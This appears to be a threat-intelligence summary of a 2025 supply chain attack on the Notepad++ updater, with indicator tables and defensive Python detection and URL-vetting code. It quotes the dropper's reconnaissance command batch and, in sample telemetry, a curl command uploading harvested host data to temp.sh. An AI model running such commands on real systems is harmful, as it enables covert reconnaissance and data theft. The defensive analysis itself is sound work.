overview

Kaspersky researchers uncovered multiple undocumented infection chains in a supply chain attack targeting Notepad++ users from July to October 2025, where attackers compromised the software's update mechanism to deliver Cobalt Strike Beacons and other malware to a limited set of victims, including organizations in Southeast Asia and financial entities.


incident overview and timeline

The attack spanned four months, with the attackers rotating command-and-control (C2) servers, downloaders, and payloads to evade detection. Initial activity began in July 2025, paused briefly, resumed in early August, continued into mid-September, and evolved again in early October. Kaspersky telemetry observed these chains on about a dozen machines; every attempt was blocked by Kaspersky products.


infection chains and technical breakdown

Attackers distributed malicious update.exe files by redirecting the Notepad++ updater's download requests to attacker-controlled URLs such as http://45.76.155[.]202/update/update.exe and http://45.32.144[.]255/update/update.exe.

These were NSIS installers that performed reconnaissance, executing cmd /c "whoami&&tasklist&&systeminfo&&netstat -ano" > a.txt, uploaded the results to temp[.]sh with curl, and then dropped next-stage payloads such as alien.dll into %APPDATA%\Adobe\Scripts.

  • Chain #1 (July-August 2025): Downloaders collected system information and delivered Cobalt Strike Beacon payloads (e.g., SHA1: 90e677d7ff5844407b9c073e3b7e896e078e11cd).

  • Chain #2 (mid-September 2025): Enhanced reconnaissance with an expanded set of shell commands; dropped alien.dll (SHA1: 6444dab57d93ce987c22da66b3706d5d7fc226da) and other files.

  • Chain #3 (early October 2025): Simplified dropper (SHA1: d7ffd7b588880cf61b603346a3557e7cce648c93) without the initial reconnaissance step, focusing on payload deployment.

Payloads relied on DLL sideloading and shellcode padding to obscure execution on Windows systems that were reached through the WinGUp updater.
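To turn the chain above into detection logic, here is an added example in Python (not code from Kaspersky or from the Notepad++ project). It replays constructed process-creation and file-creation events modelled on the behaviour described, then correlates them: a process spawned by the updater, a cmd batch of the recon tools, a curl upload to temp.sh, and a DLL written under %APPDATA%\Adobe\Scripts. The updater binary name GUp.exe, the event field layout, the user path and the exact curl command line are assumptions for the example, not facts from the write-up.

```python
import re

# Constructed sample telemetry for this example (not real logs from the
# incident). Each dict loosely mirrors Sysmon process-creation (id 1) and
# file-creation (id 11) fields and replays the behaviour the write-up describes.
EVENTS = [
    {"id": 1, "image": r"C:\Program Files\Notepad++\updater\GUp.exe",
     "parent": r"C:\Program Files\Notepad++\notepad++.exe", "cmdline": "GUp.exe"},
    {"id": 1, "image": r"C:\Users\alice\AppData\Local\Temp\update.exe",
     "parent": r"C:\Program Files\Notepad++\updater\GUp.exe", "cmdline": "update.exe"},
    {"id": 1, "image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Users\alice\AppData\Local\Temp\update.exe",
     "cmdline": 'cmd /c "whoami&&tasklist&&systeminfo&&netstat -ano" > a.txt'},
    {"id": 1, "image": r"C:\Windows\System32\curl.exe",
     "parent": r"C:\Users\alice\AppData\Local\Temp\update.exe",
     "cmdline": "curl -F file=@a.txt https://temp.sh/upload"},  # constructed
    {"id": 11, "image": r"C:\Users\alice\AppData\Local\Temp\update.exe",
     "target": r"C:\Users\alice\AppData\Roaming\Adobe\Scripts\alien.dll"},
    # Benign noise: an admin running systeminfo from an interactive shell.
    {"id": 1, "image": r"C:\Windows\System32\systeminfo.exe",
     "parent": r"C:\Windows\System32\cmd.exe", "cmdline": "systeminfo"},
]

# WinGUp's executable name is assumed here; adjust to your environment.
UPDATER_NAMES = {"gup.exe"}
RECON_TOKENS = ("whoami", "tasklist", "systeminfo", "netstat -ano")
# %APPDATA% resolves to ...\AppData\Roaming, hence the path below.
DROP_DIR_RE = re.compile(r"\\appdata\\roaming\\adobe\\scripts\\[^\\]+\.dll$", re.I)


def basename(path):
    """Lower-cased final path component of a Windows path."""
    return path.lower().rsplit("\\", 1)[-1]


def is_updater_child(ev):
    """True if the process was spawned directly by the updater binary."""
    return basename(ev.get("parent", "")) in UPDATER_NAMES


def recon_batch(cmdline):
    """Two or more of the recon tools chained with && in a single cmd line."""
    low = cmdline.lower()
    hits = [t for t in RECON_TOKENS if t in low]
    return len(hits) >= 2 and "&&" in low


def analyse(events):
    """Correlate updater -> downloaded child -> recon/upload/drop; return alerts."""
    alerts = []
    updater_children = set()
    for ev in events:
        img = ev.get("image", "").lower()
        parent = ev.get("parent", "").lower()
        cmd = ev.get("cmdline", "")
        if ev["id"] == 1 and is_updater_child(ev):
            # A legitimate update also spawns an installer here, so this alone
            # is not an alert; it only seeds the correlation set.
            updater_children.add(img)
            continue
        if ev["id"] == 1 and parent in updater_children:
            if basename(img) == "cmd.exe" and recon_batch(cmd):
                alerts.append(("recon_batch_from_update_exe", cmd))
            elif basename(img) == "curl.exe" and "temp.sh" in cmd.lower():
                alerts.append(("upload_to_temp_sh", cmd))
        if ev["id"] == 11 and img in updater_children and DROP_DIR_RE.search(ev.get("target", "")):
            alerts.append(("dll_dropped_to_adobe_scripts", ev["target"]))
    return alerts


if __name__ == "__main__":
    for rule, detail in analyse(EVENTS):
        print(f"{rule}: {detail}")
```

The correlation key is the process image spawned by the updater; in real telemetry you would key on process GUID or PID instead, since the same image path is reused by legitimate updates. The recon rule requires the tools to be chained with && on one command line, which is what distinguishes the dropper's batch from an administrator running the same tools one at a time.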


affected entities

Infections were observed on machines of individuals in Vietnam, El Salvador, and Australia, and at organizations including a Philippine government entity, a financial organization in El Salvador, and an IT service provider in Vietnam. The victim set points to targeting of Southeast Asian political and economic interests.


mitigation strategies

Notepad++ released version 8.8.9, which adds signature verification for updates. Recommendations include verifying update signatures, monitoring network traffic for anomalies, behavioral analysis of updater processes, and blocking the known IoCs (malicious URLs and file hashes). Enterprises should enforce controls on how software updates are fetched and avoid deploying tools whose updates cannot be verified.
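As an added example (not the project's updater code and not from the write-up), the following Python applies two of the recommendations above: it blocks the published IoCs by matching SHA1 digests and defanged URLs, and it vets an update download URL the way a hardened updater should, rejecting plain HTTP, IP-literal hosts, and hosts other than the expected one. The expected host notepad-plus-plus.org, the example URL paths, and the digest-pinning helper are assumptions; the pinning check stands in for, and is not, the signature verification that 8.8.9 introduces.

```python
import hashlib
import hmac
import ipaddress
from urllib.parse import urlsplit

# SHA1 IoCs from the write-up, keyed by digest.
IOC_SHA1 = {
    "90e677d7ff5844407b9c073e3b7e896e078e11cd": "chain 1/2 update.exe (Cobalt Strike delivery)",
    "573549869e84544e3ef253bdba79851dcde4963a": "chain 2 update.exe (NSIS installer with recon)",
    "6444dab57d93ce987c22da66b3706d5d7fc226da": "chain 2 alien.dll (dropped payload)",
    "13179c8f19fbf3d8473c49983a199e6cb4f318f0": "chain 2 update.exe (Cobalt Strike variant)",
    "d7ffd7b588880cf61b603346a3557e7cce648c93": "chain 3 update.exe (simplified NSIS dropper)",
}
# Defanged download URLs from the write-up.
IOC_URLS = [
    "http://45.76.155[.]202/update/update.exe",
    "http://45.32.144[.]255/update/update.exe",
]
# Host the updater is expected to talk to. An assumption for this example,
# taken from the project's public site rather than from the write-up.
EXPECTED_HOST = "notepad-plus-plus.org"


def refang(ioc):
    """Turn the defanged form used in reports back into a usable URL."""
    return ioc.replace("[.]", ".").replace("hxxp://", "http://")


def lookup_sha1(hexdigest):
    """Return the IoC label for a SHA1 digest (e.g. as reported by EDR), or None."""
    return IOC_SHA1.get(hexdigest.lower())


def sha1_of(data):
    return hashlib.sha1(data).hexdigest()


def sha256_of(data):
    return hashlib.sha256(data).hexdigest()


def vet_update_url(url, expected_host=EXPECTED_HOST):
    """Checks an updater should apply before trusting a download location.
    Returns a list of problems; an empty list means the URL passed."""
    problems = []
    parts = urlsplit(refang(url))  # refang first so "[.]" never reaches the parser
    host = parts.hostname or ""
    if parts.scheme != "https":
        problems.append("not https")
    try:
        ipaddress.ip_address(host)
        problems.append("ip literal host")
    except ValueError:
        pass  # a hostname, not an address literal
    if host != expected_host and not host.endswith("." + expected_host):
        problems.append("unexpected host")
    if refang(url) in {refang(u) for u in IOC_URLS}:
        problems.append("known malicious url")
    return problems


def verify_pinned(data, expected_sha256):
    """Compare a downloaded blob against a digest obtained out of band.
    The pin must come from a separately authenticated channel; a digest
    fetched over the same redirectable HTTP connection proves nothing."""
    return hmac.compare_digest(sha256_of(data), expected_sha256.lower())


if __name__ == "__main__":
    for u in IOC_URLS + ["https://notepad-plus-plus.org/update/example"]:
        print(u, "->", vet_update_url(u) or "ok")
    print(lookup_sha1("90e677d7ff5844407b9c073e3b7e896e078e11cd"))
```

The URL check would have rejected both observed download locations on three independent grounds before the IoC list was ever consulted, which is the point: IoC blocking catches this campaign, while the transport and host checks catch the next rotation of servers.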


background information

Supply chain attacks exploit trusted software updaters, as seen here with Notepad++'s WinGUp, where DNS manipulation or network compromise redirected users to malicious URLs. Open-source projects like Notepad++ are exposed because they have limited resources for securing their update pipelines; in this case the attackers also evaded traditional antivirus with low-entropy files and mimicry of legitimate signing. The operation fits a trend of targeted campaigns rather than mass distribution, often linked to state actors.


tables and data

Observed Malicious File Hashes

Stage/Chain   File         SHA1 Hash                                   Notes
Chain #1/2    update.exe   90e677d7ff5844407b9c073e3b7e896e078e11cd    Cobalt Strike delivery
Chain #2      update.exe   573549869e84544e3ef253bdba79851dcde4963a    NSIS installer with recon
Chain #2      alien.dll    6444dab57d93ce987c22da66b3706d5d7fc226da    Dropped payload
Chain #2      update.exe   13179c8f19fbf3d8473c49983a199e6cb4f318f0    Cobalt Strike variant
Chain #3      update.exe   d7ffd7b588880cf61b603346a3557e7cce648c93    Simplified NSIS dropper

Key Malicious URLs and Recon Commands

Component        Details                                              Purpose
C2 URLs          http://45.76.155[.]202/update/update.exe             Malicious update distribution
                 http://45.32.144[.]255/update/update.exe
Recon Endpoint   temp[.]sh (via curl)                                 System info upload
Shell Commands   whoami && tasklist && systeminfo && netstat -ano     Gather host details
